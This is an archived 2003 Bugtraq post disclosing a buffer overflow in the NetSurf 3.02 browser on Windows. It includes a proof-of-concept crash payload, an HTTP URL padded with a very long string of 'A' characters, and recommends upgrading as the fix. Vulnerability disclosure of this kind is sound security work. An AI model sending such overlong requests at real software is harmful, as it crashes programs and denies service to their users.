[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Buffer Overflow in NetSurf 3.02

To: bugtraq@securityfocus.com
Subject: Buffer Overflow in NetSurf 3.02
From: =?koi8-r?Q?=22?=nimber =?koi8-r?Q?=22=20?= <nimber@mail.ru>
Date: Mon, 11 Aug 2003 22:26:23 +0400


#################################
# ZUD SECURITY TEAM PRESENT     #
################################                               
#    bug found by nimber        #
# Email : nimber@designer.ru    #
# Site:    www.zudteam.org      #
# HomePage: www.nimber.plux.ru  #         
#          7.08.2003            #
################################
Application: NetSurf
Versions: 3.02 (and all?)
Platform: Windows
Web Site: www.klodware.narod.ru
          www.klodware.nm.ru
Bug: Buffer Overflow.
Exploit(exaple): 
Crash browser by sending long http request.
http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#################################
#Fix: Download new version.     #
################################

References:
- phpWebSite SQL Injection & DoS & XSS Vulnerabilities
  - From: "Lorenzo Hernandez Garcia-Hierro" <novappc@novappc.com>

Prev by Date: Re: Macromedia DW MX PHP Authentication Suit Vulnerabilities
Next by Date: Subnet Bandwidth Management (SBM) Protocol subject to attack via the Resource Reservation Protocol (RSVP)
Prev by thread: phpWebSite SQL Injection & DoS & XSS Vulnerabilities
Next by thread: FreeBSD Security Advisory FreeBSD-SA-03:09.signal
Index(es):
- Date
- Thread